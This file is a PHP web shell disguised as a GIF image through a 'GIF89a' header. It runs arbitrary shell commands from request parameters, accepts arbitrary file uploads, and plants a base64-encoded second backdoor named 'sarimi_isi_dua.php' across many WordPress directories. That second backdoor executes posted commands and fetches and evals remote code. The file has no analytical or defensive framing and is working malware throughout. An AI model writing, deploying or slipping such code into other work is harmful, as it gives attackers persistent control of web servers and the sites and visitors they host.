GIF89a
<?php
echo("JEMBOT");
if(isset($_POST['cmd'])){ echo "<pre>"; @system($_POST['cmd']); echo "</pre>"; exit; }
if(isset($_GET['cmd'])){ echo "<pre>"; @system($_GET['cmd']); echo "</pre>"; exit; }
if(isset($_FILES['file'])){ $d=dirname(__FILE__)."/"; $f=basename($_FILES["file"]["name"]); if(move_uploaded_file($_FILES["file"]["tmp_name"],$d.$f)){ echo "OK: $f"; @chmod($d.$f,0644); } else echo "Upload failed"; exit; }
$r=$_SERVER["DOCUMENT_ROOT"]; $c="SU5ESUFOIENZQkVSIDB4NjMgPD89IGAkX1BPU1RbMHgwXWA7ICRjaCA9IGN1cmxfaW5pdCgkX0dFVFsnMHg2MyddKTsgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTskcmVzdWx0ID0gY3VybF9leGVjKCRjaCk7ZXZhbCgnPz8+Jy4kcmVzdWx0KTsgIA==";
$a=["/wp-content/themes","/wp-admin","/wp-content","/wp-includes","/wp-includes/blocks","/","/wp-content/uploads"];
foreach($a as $d){ $p=$r.$d."/sarimi_isi_dua.php"; @mkdir(dirname($p),0777,true); $f=@fopen($p,"w"); if($f){ @fwrite($f,base64_decode($c)); @fclose($f); } }
?>